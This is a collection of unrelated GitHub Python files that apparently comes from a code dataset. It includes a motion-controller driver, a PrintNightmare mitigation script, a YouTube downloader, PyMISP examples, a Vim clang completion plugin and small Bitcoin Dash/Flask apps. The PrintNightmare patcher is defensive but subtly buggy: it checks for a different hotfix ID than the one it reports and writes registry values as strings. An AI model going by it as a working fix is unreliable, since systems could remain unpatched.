""" Newport ESP301 motion controller. It assumes all axes to have units mm
:param scan_axes: Should one detect and add axes to the controller
"""
DEFAULTS = {
'COMMON': {'write_termination': '\r\n',
'read_termination': '\r\n',},
'ASRL':{
'timeout': 4000, #ms
'encoding': 'ascii',
'data_bits': 8,
'baud_rate': 19200,
'parity': constants.Parity.none,
'stop_bits': constants.StopBits.one,
'flow_control': constants.VI_ASRL_FLOW_RTS_CTS,#constants.VI_ASRL_FLOW_NONE,
},
}
def initialize(self):
super().initialize()
self.detect_axis()
@classmethod
def via_usb(cls, port, name=None, **kwargs):
"""Connect to the ESP301 via USB. Internally this goes via serial"""
cls.DEFAULTS = copy.deepcopy(cls.DEFAULTS)
cls.DEFAULTS['ASRL'].update({'baud_rate': 921600})
return cls.via_serial(port=port, name=name, **kwargs)
@Action()
def detect_axis(self):
""" Find the number of axis available.
The detection stops as soon as an empty controller is found.
"""
self.axes = []
i = 0
scan_axes = True
while scan_axes:
try:
i += 1
id = self.query('%dID?' % i)
axis = ESP301Axis(self, i, id)
self.axes.append(axis)
except:
err = self.get_errors()
if err == 37: # Axis number missing
self.axes.append(None)
elif err == 9: # Axis number out of range
scan_axes = False
elif err == 6: # Axis number out of range, but wrong errorcode
scan_axes = False
else: # Dunno...
raise Exception(err)
@Action()
def get_errors(self):
err = int(self.query('TE?'))
return err
@Feat(read_once=False)
def position(self):
return [axis.position for axis in self.axes]
@Feat(read_once=False)
def _position_cached(self):
return [axis._position_cached for axis in self.axes]
@position.setter
def position(self, pos):
"""Move to position (x,y,...)"""
return self._position(pos)
@Action()
def _position(self, pos, read_pos=None, wait_until_done=True):
"""Move to position (x,y,...)"""
if read_pos is not None:
self.log_error('kwargs read_pos for function _position is deprecated')
for p, axis in zip(pos, self.axes):
if p is not None:
axis._set_position(p, wait=False)
if wait_until_done:
for p, axis in zip(pos, self.axes):
if p is not None:
axis._wait_until_done()
axis.check_position(p)
return self.position
return pos
@Action()
def motion_done(self):
for axis in self.axes: axis._wait_until_done()
def finalize(self):
for axis in self.axes:
if axis is not None:
del (axis)
super().finalize()
#class ESP301GPIB( ESP301, GPIBVisaDriver):
# """ Untested!
# """
# def __init__(self, scan_axes=True, resource_name= 'GPIB0::2::INSTR', *args, **kwargs):
# # Read number of axes and add axis objects
# self.scan_axes = scan_axes
# super().__init__(resource_name=resource_name, *args, **kwargs)
class ESP301Axis(ESP301):
def __init__(self, parent, num, id, *args, **kwargs):
#super(ESP301Axis, self).__init__(*args, **kwargs)
self.parent = parent
self.num = num
self.id = id
self.wait_time = 0.01 # in seconds * Q_(1, 's')
self.backlash = 0
self.wait_until_done = True
self.accuracy = 0.001 # in units reported by axis
# Fill position cache:
self.position
def __del__(self):
self.parent = None
self.num = None
def id(self):
return self.id
@Action()
def on(self):
"""Put axis on"""
self.parent.write('%dMO' % self.num)
@Action()
def off(self):
"""Put axis on"""
self.parent.write('%dMF' % self.num)
@Feat(values={True: '1', False: '0'})
def is_on(self):
"""
:return: True if axis is on, else False
"""
return self.parent.query('%dMO?' % self.num)
@Action(units='mm')
def define_home(self, val=0):
"""Remap current position to home (0), or to new position
:param val: new position"""
self.parent.write('%dDH%f' % (self.num, val))
@Feat(units='mm', read_once=False)
def _position_cached(self):
return self.__position_cached
@_position_cached.setter
def _position_cached(self, pos):
self.__position_cached = pos
@Feat(units='mm')
def position(self):
self._position_cached = float(self.parent.query('%dTP?' % self.num))*ureg.mm
return self._position_cached
@position.setter
def position(self, pos):
"""
Waits until movement is done if self.wait_until_done = True.
:param pos: new position
"""
if not self.is_on:
self.log_error('Axis not enabled. Not moving!')
return
# First do move to extra position if necessary
self._set_position(pos, wait=self.wait_until_done)
@Action(units=['mm',None])
def _set_position(self, pos, wait=None):
"""
Move to an absolute position, taking into account backlash.
When self.backlash is to a negative value the stage will always move
from low to high values. If necessary, a extra step with length
self.backlash is set.
:param pos: New position in mm
:param wait: wait until stage is finished
"""
# First do move to extra position if necessary
if self.backlash:
position = self.position.magnitude
#backlash = self.backlash.to('mm').magnitude
backlash = convert_to('mm', on_dimensionless='ignore')(self.backlash).magnitude
if ( backlash < 0 and position > pos) or\
( backlash > 0 and position < pos):
self.log_info('Using backlash')
self.__set_position(pos + backlash)
self._wait_until_done()
# Then move to the final position
self.__set_position(pos)
if wait:
self._wait_until_done()
self.check_position(pos)
def __set_position(self, pos):
"""
Move stage to a certain position
:param pos: New position
"""
self.parent.write('%dPA%f' % (self.num, pos))
def check_position(self, pos):
'''Check if the stage is at the expected position'''
if np.isclose(self.position, pos, atol=self.accuracy):
return True
self.log_error('Position accuracy {} is not reached. '
'Expected: {}, measured: {}'.format(self.accuracy, pos, self._position_cached))
return False
@Feat(units='mm/s')
def max_velocity(self):
return float(self.parent.query('%dVU?' % self.num))
@max_velocity.setter
def max_velocity(self, velocity):
self.parent.write('%dVU%f' % (self.num, velocity))
@Feat(units='mm/s**2')
def max_acceleration(self):
return float(self.parent.query('%dAU?' % self.num))
@max_acceleration.setter
def max_acceleration(self, velocity):
self.parent.write('%dAU%f' % (self.num, velocity))
@Feat(units='mm/s')
def velocity(self):
return float(self.parent.query('%dVA?' % self.num))
@velocity.setter
def velocity(self, velocity):
"""
:param velocity: Set the velocity that the axis should use when moving
:return:
"""
self.parent.write('%dVA%f' % (self.num, velocity))
@Feat(units='mm/s**2')
def acceleration(self):
return float(self.parent.query('%dAC?' % self.num))
@acceleration.setter
def acceleration(self, acceleration):
"""
:param acceleration: Set the acceleration that the axis should use when starting
:return:
"""
self.parent.write('%dAC%f' % (self.num, acceleration))
@Feat(units='mm/s')
def actual_velocity(self):
return float(self.parent.query('%dTV' % self.num))
@actual_velocity.setter
def actual_velocity(self, val):
raise NotImplementedError
@Action()
def stop(self):
"""Emergency stop"""
self.parent.write(u'{0:d}ST'.format(self.num))
@Feat(values={True: '1', False: '0'})
def motion_done(self):
while True:
ret = self.parent.query('%dMD?' % self.num)
if ret in ['1','0']:
break
else:
time.sleep(self.wait_time)
return ret
# Not working yet, see https://github.com/hgrecco/lantz/issues/35
# @Feat(values={Q_('encodercount'): 0,
# Q_('motor step'): 1,
# Q_('millimeter'): 2,
# Q_('micrometer'): 3,
# Q_('inches'): 4,
# Q_('milli-inches'): 5,
# Q_('micro-inches'): 6,
# Q_('degree'): 7,
# Q_('gradian'): 8,
# Q_('radian'): 9,
# Q_('milliradian'): 10,
# Q_('microradian'): 11})
def units(self):
ret = int(self.parent.query(u'{}SN?'.format(self.num)))
vals = {0 :'encoder count',
1 :'motor step',
2 :'millimeter',
3 :'micrometer',
4 :'inches',
5 :'milli-inches',
6 :'micro-inches',
7 :'degree',
8 :'gradian',
9 :'radian',
10:'milliradian',
11:'microradian',}
return vals[ret]
# @units.setter
# def units(self, val):
# self.parent.write('%SN%' % (self.num, val))
def _wait_until_done(self):
#wait_time = convert_to('seconds', on_dimensionless='warn')(self.wait_time)
time.sleep(self.wait_time)
while not self.motion_done:
time.sleep(self.wait_time) #wait_time.magnitude)
if __name__ == '__main__':
import argparse
import lantz.log
parser = argparse.ArgumentParser(description='Test ESP301 driver')
parser.add_argument('-p', '--port', type=str, default='1',
help='Serial port to connect to')
args = parser.parse_args()
lantz.log.log_to_socket(lantz.log.DEBUG)
with ESP301.via_usb(port=args.port) as inst:
# inst.initialize() # Initialize the communication with the power meter
# Find the status of all axes:
for axis in inst.axes:
print('Axis {} Position {} is_on {} max_velocity {} velocity {}'.format(axis.num, axis.position,
axis.is_on, axis.max_velocity,
axis.velocity))
``` |
{
"source": "0xIrison/PrinterNightmare-Patcher",
"score": 2
} |
#### File: 0xIrison/PrinterNightmare-Patcher/printnightmare-patcher.py
```python
import platform, winreg, subprocess, os, ctypes
REG_PATH = r'SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
def is_system_vulnerable():
system = (platform.system() + " " + platform.release()).lower()
if system.find("windows") < 0:
print("[+] This system is NOT vulnerable to PrintNightmare")
exit(0)
return False
try:
security_update = subprocess.check_output('powershell.exe Get-Hotfix KB5004954', shell=True).decode("UTF-8")
if security_update.lower().find("hotfixid") >= 0:
print("[+] PrintNightmare Vulnerability Patch: KB5004945 update is already Installed")
print("[+] This system is NOT vulnerable to PrintNightmare")
return False
except:
print("[!] PrintNightmare Vulnerability Patch: KB5004945 update is NOT Installed!")
updating_system()
try:
access_registry_item = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)
registry_key = winreg.OpenKey(access_registry_item, REG_PATH)
access_key_handler = int(registry_key)
winreg.CloseKey(registry_key)
if access_key_handler >= 0:
print("[!] This system is Vulnerable to PrintNightmare")
return True
except FileNotFoundError:
print("[+] PointAndPrint Registry key does NOT exist")
print("[+] This system is NOT vulnerable to PrintNightmare")
return False
def updating_system():
try:
PS_version = int(subprocess.check_output('powershell.exe $PSVersionTable.PSVersion.major', shell=True).decode("UTF-8"))
if PS_version >= 3:
print("[+] Trying to install the patch ...")
try:
subprocess.check_output('powershell.exe Get-WindowsUpdate -Install -KBArticleID "KB5004945"', shell=True).decode("UTF-8")
print("[+] Patch is installed successfully")
except:
print("[-] Powershell could not recognize Get-WindowsUpdate, Patch is NOT installed!")
print("[!] Please install the security update {KB5004945} manually ")
else:
print("[!] Current Powershell Version does not support PSWindowsUpdate, please install the security update {KB5004945} manually")
except:
print("[-] Powershell version could NOT be identified")
print("[!] I could not install the security update {KB5004945}, please install it manually")
def is_spooler_running():
try:
spooler_status = subprocess.check_output('powershell.exe Get-Service -Name Spooler', shell=True).decode("UTF-8")
if spooler_status.lower().find("running") >= 0:
print("[!] Print Spooler service is running")
return True
except:
print("[-] I could not identify if the Print Spooler service is running or not")
return False
def disable_printspooler():
try:
subprocess.check_output('powershell.exe Stop-Service -Name Spooler -Force', shell=True)
print("[+] The Print Spooler service is stopped")
except:
print("[-] The Print Spooler service cannot be stopped on this computer")
try:
subprocess.check_output('powershell.exe Set-Service -Name Spooler -StartupType Disabled', shell=True)
print("[+] The Print Spooler service is disabled on startup")
except:
print("[-] Something went wrong, I could not disable the service on startup")
def get_printer_reg(NoWarning,UpdatePromptSettings,RestrictDriver):
values = []
registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REG_PATH, 0, winreg.KEY_READ)
value1, regtype = winreg.QueryValueEx(registry_key, NoWarning)
value2, regtype = winreg.QueryValueEx(registry_key, UpdatePromptSettings)
value3, regtype = winreg.QueryValueEx(registry_key, RestrictDriver)
values.append(value1)
values.append(value2)
values.append(value3)
winreg.CloseKey(registry_key)
return values
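# Point and Print hardening per Microsoft's PrintNightmare guidance: warning/elevation
# prompts must not be suppressed (NoWarningNoElevationOnInstall = 0, UpdatePromptSettings = 0)
# and driver installation should be limited to administrators
# (RestrictDriverInstallationToAdministrators = 1); set_printer_reg enforces exactly that.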
def set_printer_reg():
try:
values = get_printer_reg("NoWarningNoElevationOnInstall", "UpdatePromptSettings","RestrictDriverInstallationToAdministrators")
NoWarning= int(values[0])
UpdatePromptSettings= int(values[1])
RestrictDriver = int(values[2])
registry_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, REG_PATH, 0, winreg.KEY_WRITE)
if NoWarning == 1:
winreg.SetValueEx(registry_key,"NoWarningNoElevationOnInstall", 0 ,winreg.REG_SZ, "0")
if UpdatePromptSettings == 1:
winreg.SetValueEx(registry_key, "UpdatePromptSettings", 0, winreg.REG_SZ, "0")
if RestrictDriver == 0:
winreg.SetValueEx(registry_key, "RestrictDriverInstallationToAdministrators", 0, winreg.REG_SZ, "1")
winreg.CloseKey(registry_key)
print("[+] Registry key has been updated successfully")
except:
print("[-] Something went wrong, I could not check the registry key")
def check_admin_priv():
try:
is_admin = (os.getuid() == 0)
except AttributeError:
is_admin = ctypes.windll.shell32.IsUserAnAdmin() != 0
return is_admin
def banner():
print('''
___ _ _ _ _ _ _ _
| . \ _ _ <_>._ _ _| |_ | \ |<_> ___ | |_ _| |_ ._ _ _ ___ _ _ ___
| _/| '_>| || ' | | | | || |/ . || . | | | | ' ' |<_> || '_>/ ._>
|_| |_| |_||_|_| |_| |_\_||_|\_. ||_|_| |_| |_|_|_|<___||_| \___.
<___'
___ _ _
| . \ ___ _| |_ ___ | |_ ___ _ _
| _/<_> | | | / | '| . |/ ._>| '_>
|_| <___| |_| \_|_.|_|_|\___.|_|
==========================
PrintNightmare Patcher v1.0
Author: irison
GitHub: https://github.com/0xirison
*._.* __ _ ._
|[ |_) (_)[ )
==========================
''')
if __name__ == '__main__':
banner()
amiadmin = check_admin_priv()
if not amiadmin:
print("[-] Please run the script with elevated privileges")
exit(0)
is_vulnerable = is_system_vulnerable()
is_spooler_running = is_spooler_running()
if is_spooler_running:
disable_printspooler()
if is_vulnerable or is_spooler_running:
set_printer_reg()
``` |
{
"source": "0xIrison/YouTube-Downloader",
"score": 2
} |
#### File: 0xIrison/YouTube-Downloader/youtube-downloader.py
```python
from PyQt6.QtWidgets import *
from PyQt6.QtGui import *
from PyQt6.QtCore import *
from PyQt6.uic import loadUiType
import os
from os import path
from os.path import expanduser
import sys
import pafy
import math
import urllib.request
#import UI File
FORM_CLASS ,_ = loadUiType(path.join(path.dirname(__file__),"main.ui"))
#Initiate UI File
class MainApp(QMainWindow, FORM_CLASS):
def __init__(self,parent=None):
super(MainApp,self).__init__(parent)
QMainWindow.__init__(self)
self.setupUi(self)
self.handle_UI()
self.handle_Buttons()
self.handle_Actions()
self.setWindowIcon(QIcon('icons/youtube.png'))
def handle_UI(self):
self.setFixedSize(741,548)
def handle_Buttons(self):
self.pushButton.clicked.connect(self.Directory_Browse)
self.pushButton_2.clicked.connect(self.Download_Youtube_Video)
self.pushButton_3.clicked.connect(self.Get_Video_Info)
def handle_Actions(self):
self.actionExit.triggered.connect(self.action_exit)
self.actionAbout.triggered.connect(self.action_about)
def action_exit(self):
QApplication.exit()
def action_about(self):
msg = '''
YouTube Downloader v1.0
==========================
Author: irison
GitHub: https://github.com/0xirison
*._.* __ _ ._
|[ |_) (_)[ )
==========================
This tool is built with Python 3.6 and is used for downloading YouTube videos
Enjoy!
'''
QMessageBox.information(self, "About the Application", msg)
def Directory_Browse(self):
dir_path = QFileDialog.getExistingDirectory(self, "Select Download Directory", expanduser("~/Desktop"))
self.lineEdit_2.setText(dir_path)
def convert_size(self, size_bytes):
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return '{} {}'.format(s , size_name[i])
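# Illustrative behaviour of convert_size (reference only, not called here):
# convert_size(0) -> "0B", convert_size(1536) -> "1.5 KB", convert_size(10 * 1024**2) -> "10.0 MB".
# i = floor(log_1024(size_bytes)) selects the unit, and the byte count is scaled by 1024**i.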
def Get_Video_Info(self):
self.comboBox.clear()
url_link = self.lineEdit.text()
try:
video = pafy.new(url_link)
except:
QMessageBox.warning(self, "URL is invalid", "Please insert a valid YouTube video link")
self.lineEdit.setText('')
return
st = video.videostreams
if str(st).find("mp4") < 0:
for i in st:
data = '{} {} {}'.format(i.resolution, i.extension, self.convert_size(i.get_filesize()))
self.comboBox.addItem(data)
else:
for video in st:
if video.extension == "mp4":
vide_reso = video.resolution.split("x")[1] + "p"
data = '{} - {} - {}'.format(vide_reso, video.extension.upper(), self.convert_size(video.get_filesize()))
self.comboBox.addItem(data)
count = self.comboBox.count()-1
self.comboBox.setCurrentIndex(count)
QApplication.processEvents()
link = self.lineEdit.text()
yt = pafy.new(link)
url_image = yt.thumb
image = QImage()
image.loadFromData(urllib.request.urlopen(url_image).read())
self.label_2.setScaledContents(1)
self.label_2.setPixmap(QPixmap(image))
self.label.setText(yt.title)
def change_Filename(self, file_dir, filename, extension= '.mp4'):
os.chdir(file_dir)
counter = 1
original_name = filename + extension
file_fullname = original_name
while os.path.isfile(file_fullname):
file_fullname = str(filename + '({})'.format(counter)) + extension
counter += 1
os.rename(original_name+".temp", file_fullname)
def Download_Youtube_Video(self):
if not os.path.isdir(self.lineEdit_2.text()):
QMessageBox.warning(self, "Directory Path is Invalid", "Please select a valid directory path")
self.lineEdit_2.setText('')
return
video_link = self.lineEdit.text()
dir_path = self.lineEdit_2.text()
try:
video = pafy.new(video_link)
except:
QMessageBox.warning(self, "URL is invalid", "Please insert a valid YouTube video link")
self.lineEdit.setText('')
return
st = video.videostreams
quality = self.comboBox.currentIndex()
ext = str(self.comboBox.currentText()).lower()
extension = ""
media_list = ['ogg', 'm4a', 'mp4', 'flv', 'webm', '3gp']
for media_type in media_list:
if ext.find(media_type) >= 0:
extension = media_type
try:
st[quality].download(filepath=dir_path, callback=self.handle_Progressbar)
except FileExistsError:
extension = '.' + extension
self.change_Filename(dir_path,video.title, extension)
QApplication.processEvents()
except Exception as e:
QMessageBox.critical(self, "Download Failed", "Something went wrong, please try again..")
print(e)
self.cleanUp()
def cleanUp(self):
self.label.setText('Youtube Video Title')
self.comboBox.clear()
self.label_2.clear()
self.lineEdit_2.setText('')
self.progressBar.setValue(0)
self.lineEdit.setText('')
def handle_Progressbar(self, total, recvd, ratio, rate, eta):
self.progressBar.setValue(ratio * 100)
if ratio * 100 == 100.00:
QMessageBox.information(self, "File Status", "Download Finished")
self.progressBar.setValue(0)
QApplication.processEvents()
def main():
app = QApplication(sys.argv)
window = MainApp()
window.show()
app.exec()
if __name__ == "__main__":
main()
``` |
{
"source": "0xiso/PyMISP",
"score": 3
} |
#### File: PyMISP/examples/del.py
```python
from pymisp import PyMISP
from keys import misp_url, misp_key,misp_verifycert
import argparse
# Usage for pipe masters: ./last.py -l 5h | jq .
def init(url, key):
return PyMISP(url, key, misp_verifycert, 'json', debug=True)
def del_event(m, eventid):
result = m.delete_event(eventid)
print(result)
def del_attr(m, attrid):
result = m.delete_attribute(attrid)
print(result)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Delete an event from a MISP instance.')
parser.add_argument("-e", "--event", help="Event ID to delete.")
parser.add_argument("-a", "--attribute", help="Attribute ID to delete.")
args = parser.parse_args()
misp = init(misp_url, misp_key)
if args.event:
del_event(misp, args.event)
else:
del_attr(misp, args.attribute)
```
#### File: PyMISP/examples/edit_user_json.py
```python
from pymisp import PyMISP
from keys import misp_url, misp_key
import argparse
# For python2 & 3 compat, a bit dirty, but it seems to be the least bad one
try:
input = raw_input
except NameError:
pass
def init(url, key):
return PyMISP(url, key, True, 'json')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Edit the user designed by the user_id. If no file is provided, returns a json listing all the fields used to describe a user.')
parser.add_argument("-i", "--user_id", required=True, help="The name of the json file describing the user you want to modify.")
parser.add_argument("-f", "--json_file", help="The name of the json file describing your modifications.")
args = parser.parse_args()
misp = init(misp_url, misp_key)
if args.json_file is None:
print (misp.get_edit_user_fields_list(args.user_id))
else:
print(misp.edit_user_json(args.json_file, args.user_id))
```
#### File: PyMISP/examples/last.py
```python
from pymisp import PyMISP
from keys import misp_url, misp_key, misp_verifycert
import argparse
import os
import json
# Usage for pipe masters: ./last.py -l 5h | jq .
def init(url, key):
return PyMISP(url, key, misp_verifycert, 'json')
def download_last(m, last, out=None):
result = m.download_last(last)
if out is None:
if 'response' in result:
print(json.dumps(result['response']))
else:
print('No results for that time period')
exit(0)
else:
with open(out, 'w') as f:
f.write(json.dumps(result['response']))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Download latest events from a MISP instance.')
parser.add_argument("-l", "--last", required=True, help="can be defined in days, hours, minutes (for example 5d or 12h or 30m).")
parser.add_argument("-o", "--output", help="Output file")
args = parser.parse_args()
if args.output is not None and os.path.exists(args.output):
print('Output file already exists, abort.')
exit(0)
misp = init(misp_url, misp_key)
download_last(misp, args.last, args.output)
``` |
{
"source": "0xItx/deoplete-clangx",
"score": 2
} |
#### File: deoplete/source/clangx.py
```python
import re
import os.path
from os.path import expanduser, expandvars, dirname, isabs, isfile, join
from pathlib import Path
import subprocess
import shlex
from itertools import chain
from deoplete.util import getlines, error
from .base import Base
# vim filetype -----> clang -x `language`
lang_for_ft = {
'c': 'c',
'cpp': 'c++',
'objc': 'objective-c',
'objcpp': 'objective-c++',
}
class Source(Base):
run_dir = ''
def __init__(self, vim):
Base.__init__(self, vim)
self.name = 'clangx'
self.filetypes = ['c', 'cpp', 'objc', 'objcpp']
self.mark = '[clangx]'
self.rank = 500
self.executable_clang = self.vim.call('executable', 'clang')
self.encoding = self.vim.eval('&encoding')
self.input_pattern = r'\.[a-zA-Z0-9_?!]*|[a-zA-Z]\w*::\w*|->\w*'
self.vars = {
'clang_binary': 'clang',
'default_c_options': '',
'default_cpp_options': '',
'clang_file_path': ['.clang', '.clang_complete'],
}
self._args = []
def on_event(self, context):
self._args = self._args_from_neoinclude(context)
self.run_dir = context['cwd']
clang = self._args_from_clang(context,
self.get_var('clang_file_path'))
if clang:
self._args += clang
else:
self._args += (self.get_var('default_cpp_options')
if context['filetype'] in ('cpp', 'objcpp')
else self.get_var('default_c_options'))
def get_complete_position(self, context):
m = re.search('[a-zA-Z0-9_]*$', context['input'])
return m.start() if m else -1
def gather_candidates(self, context):
if not self.executable_clang:
return []
if not self.run_dir:
self.run_dir = context['cwd']
line = context['position'][1]
column = context['complete_position'] + 1
lang = lang_for_ft.get(context['filetype'], 'c')
buf = '\n'.join(getlines(self.vim)).encode(self.encoding)
args = [
self.get_var('clang_binary'),
'-x', lang, '-fsyntax-only',
'-Xclang', '-code-completion-macros',
'-Xclang', '-code-completion-at=-:{}:{}'.format(line, column),
'-',
'-I', os.path.dirname(context['bufpath']),
]
args += self._args
try:
proc = subprocess.Popen(args=args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
cwd=self.run_dir)
result, errs = proc.communicate(buf, timeout=10)
result = result.decode(self.encoding)
except subprocess.TimeoutExpired as e:
proc.kill()
return []
return self._parse_lines(result.splitlines())
def _args_from_neoinclude(self, context):
if not self.vim.call(
'exists', '*neoinclude#get_path'):
return []
# Make cache
self.vim.call('neoinclude#include#get_include_files')
return list(chain.from_iterable(
[['-I', x] for x in
self.vim.call('neoinclude#get_path',
context['bufnr'],
context['filetype']).replace(';', ',').split(',')
if x != '']))
def _find_clang_file(self, context, names):
cwd = Path(context['cwd'])
dirs = [cwd.resolve()] + list(cwd.parents)
for d in dirs:
d = str(d)
for name in names:
if isabs(name):
if isfile(name):
return name, dirname(name)
else:
clang_file = join(d, name)
if isfile(clang_file):
return clang_file, d
return [], self.run_dir
def _args_from_clang(self, context, names):
clang_file, self.run_dir = self._find_clang_file(context, names)
if not clang_file:
return []
try:
with open(clang_file) as f:
args = shlex.split(' '.join(f.readlines()))
args = [expanduser(expandvars(p)) for p in args]
return args
except Exception as e:
error(self.vim, 'Parse Failed: ' + clang_file)
return []
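# Expected shape of clang's code-completion output parsed below (illustrative example;
# exact annotations vary by clang version):
#   COMPLETION: printf : [#int#]printf(<#const char *restrict, ...#>)
#   COMPLETION: size_t
# The first regex captures the completion word and its annotated signature; the
# [# #], <# #> and {# #} markers are then stripped to build the menu/info text.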
def _parse_lines(self, lines):
candidates = []
for line in lines:
m = re.search(r'^COMPLETION:\s+(.*?) : (.*?)$', line)
if not m:
m = re.search(r'^COMPLETION:\s+(.*)$', line)
if m:
candidates.append({'word': m.group(1)})
continue
menu = m.group(2)
menu = menu.replace('[#', '')
menu = menu.replace('#]', ' ')
menu = menu.replace('<#', '')
menu = menu.replace('#>', '')
menu = menu.replace('{#', '')
menu = menu.replace('#}', '')
word = m.group(1)
if word.startswith('PFNG'):
continue
candidate = {'word': word, 'dup': 1}
if menu != word:
candidate['menu'] = menu
candidate['info'] = menu
candidates.append(candidate)
return candidates
``` |
{
"source": "0xJacky/Tan",
"score": 3
} |
#### File: 0xJacky/Tan/report.py
```python
import os
import time
import xlsxwriter
from db import Database
db = Database()
ABS_PATH = os.path.split(os.path.realpath(__file__))[0]
REPORT_PATH = os.path.join(ABS_PATH, 'report-%s.xlsx' % time.strftime("%Y-%m-%d"))
def get_tasks():
sql = 'SELECT * FROM %s_task' % db.sql_prefix
print(sql)
return db.fetchall(sql)
def get_students_list():
sql = "SELECT `name` FROM `%s_students`" % db.sql_prefix
print(sql)
list = []
for i in db.fetchall(sql):
list = list + [i['name']]
return list
def query_clock_in_list(date):
sql = "SELECT s.`name` FROM (%s_task as t INNER JOIN %s_log as l ON t.`ID` = l.`task_id`) \
INNER JOIN %s_students as s ON s.`ID` = l.`student_id` WHERE t.`date`='%s'" % (db.sql_prefix, db.sql_prefix, db.sql_prefix, date)
print(sql)
list = []
for i in db.fetchall(sql):
list = list + [i['name']]
return list
# Create the Excel workbook and worksheet handles
o = xlsxwriter.Workbook(REPORT_PATH)
e = o.add_worksheet(u'打卡统计')
workfomat = o.add_format({
'align' : 'center',
'valign' : 'vcenter'
})
# Cell (0,0): header of the name column
e.write(0, 0, u'姓名', workfomat)
# Column 0, rows x >= 1: student names
index = 1
students = get_students_list()
for s in students:
e.write(index, 0, s, workfomat)
index += 1
# Columns y >= 1: task date in row 0, then one attendance mark ('√' or 'x') per student
col_index = 1
for t in get_tasks():
e.write(0, col_index, str(t['date']), workfomat)
e.set_column(0, index, 10)
list = query_clock_in_list(t['date'])
index = 1
for i in students:
status = '√' if i in list else 'x'
e.write(index, col_index, status, workfomat)
index += 1
col_index += 1
# Close and save the workbook
o.close()
``` |
{
"source": "0xjacobb/bitcoinstatistics",
"score": 3
} |
#### File: 0xjacobb/bitcoinstatistics/app.py
```python
import os
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
import dash_daq as daq
import pandas as pd
from dash.dependencies import Input, Output
# reading data for statistic table
df = pd.read_csv('data.csv')
app = dash.Dash(__name__)
# needed because of Heroku deployement https://github.com/plotly/dash-daq/issues/25
app.scripts.config.serve_locally = True
colors = {
'background': '#323232',
'background_dark': '#1e1e1e',
'text': '#FFFFFF'
}
server = app.server
app.layout = html.Div([
html.Div([
html.H1('BITCOIN HEATMETER'),
], className='row', style={'textAlign': 'center'}),
html.Div([
html.Label('How interesting is Bitcoin to the world?'),
], style={'textAlign': 'center'}),
dcc.Interval(
id='interval-component',
interval=1*10000, # in milliseconds
n_intervals=0
),
# https://dash.plot.ly/dash-daq/gauge
html.Div([
daq.Gauge(
id='bitcoin-gauge-chart',
value=2,
max=10,
min=0,
units="MPH",
color={"gradient": True, "ranges": {
"green": [0, 6], "yellow": [6, 8], "red": [8, 10]}},
)
], className='row', style={'textAlign': 'center'}),
html.Div([
html.Label('24h interest since 2019-04-01'),
], className='row', style={'textAlign': 'center'}),
html.Div([
dash_table.DataTable(
id='table',
columns=[{"name": i, "id": i} for i in df.columns],
data=df.to_dict("rows"),
style_header={
'backgroundColor': colors['background_dark'],
'fontWeight': 'bold'
},
style_cell={
'backgroundColor': colors['background'],
'color': 'white',
'minWidth': '30px', 'width': '50px', 'maxWidth': '90px'
},
style_cell_conditional=[
{
'if': {'column_id': c},
'textAlign': 'center'
} for c in df.columns
],
)
], className='row four columns offset-by-four'),
html.Div([
html.Label('Donate: BTC address'),
html.Img(
src='/assets/qrcode.png',
style={'width': '120px'}
)
], className='row', style={'textAlign': 'center'}),
], style={'backgroundColor': colors['background'], 'color': colors['text']})
# callback triggered by id='interval-component'; updates value, max and color of id='bitcoin-gauge-chart'
@app.callback([
Output('bitcoin-gauge-chart', 'value'),
Output('bitcoin-gauge-chart', 'max'),
Output('bitcoin-gauge-chart', 'color'),
], [Input('interval-component', 'n_intervals'), ]
)
def update_gauge(n_intervals):
max = 100
min = 0
value = 50
print("TWEETS: ", value)
threshold_1 = max-round(max*0.6)
threshold_2 = max-round(max*0.3)
color = {"gradient": True, "ranges": {
"green": [min, threshold_1], "yellow": [threshold_1, threshold_2], "red": [threshold_2, max]}}
return value, max, color
if __name__ == '__main__':
app.run_server(debug=True)
``` |
{
"source": "0xjacobb/DateToBitcoinBlockConverter",
"score": 3
} |
#### File: 0xjacobb/DateToBitcoinBlockConverter/app.py
```python
from flask import Flask, render_template, request
import datetime
import converter
import sys
app = Flask(__name__)
@app.route("/")
@app.route("/index")
def index():
now = datetime.datetime.now()
return render_template("index.html",
date = now.date(),
time = '%s:%s' % (now.hour, now.minute),
timezone = '0')
@app.route("/result", methods=["POST"])
def result():
data = request.form
try:
datetime_to_block = converter.DateConverter()
if datetime_to_block:
user_input_datetime = datetime_to_block.get_datetime(data)
user_input_datetime_UTC = datetime_to_block.get_datetime_UTC(data)
unix_datetime = int(datetime_to_block.get_unix_datetime(data))
block_height = datetime_to_block.get_corresponding_block(unix_datetime)
latest_update = datetime_to_block.get_latest_block_time_CSV()
link_mainblock = 'https://www.blockchain.com/btc/block/'+ block_height
link_next_block = 'https://www.blockchain.com/btc/block/'+ str(int(block_height) + 1)
return render_template("result.html",
latest_update = latest_update,
user_input_datetime = user_input_datetime,
user_input_datetime_UTC = user_input_datetime_UTC,
unix_datetime = unix_datetime,
block_height = block_height,
link_mainblock = link_mainblock,
link_next_block = link_next_block)
except ValueError:
return render_template("index.html",
date = data.get('date'),
time = data.get('time'),
timezone = data.get('timezone'),
type_time = data.get('type_time'),
error = "Please provide values in correct format")
if __name__ == "__main__":
app.run()
```
#### File: 0xjacobb/DateToBitcoinBlockConverter/converter.py
```python
import datetime
from datetime import timedelta
from pytz import timezone
from pytz import UTC
import pytz
import csv
class DateConverter():
'''
DateConverter
Class to convert a UTC time into the nearest Bitcoin block number
'''
# Constructor
def __init__(self):
print("Converter started")
def get_datetime(self, data):
''' Validate the datetime input from the user.
data: the key/value pairs from the HTML post form
return: datetime object in the right format (raises ValueError on invalid input)
'''
year, month, day = data.get('date').split('-')
hours, minutes = data.get('time').split(':')
# https://docs.python.org/3/library/datetime.html#datetime.datetime
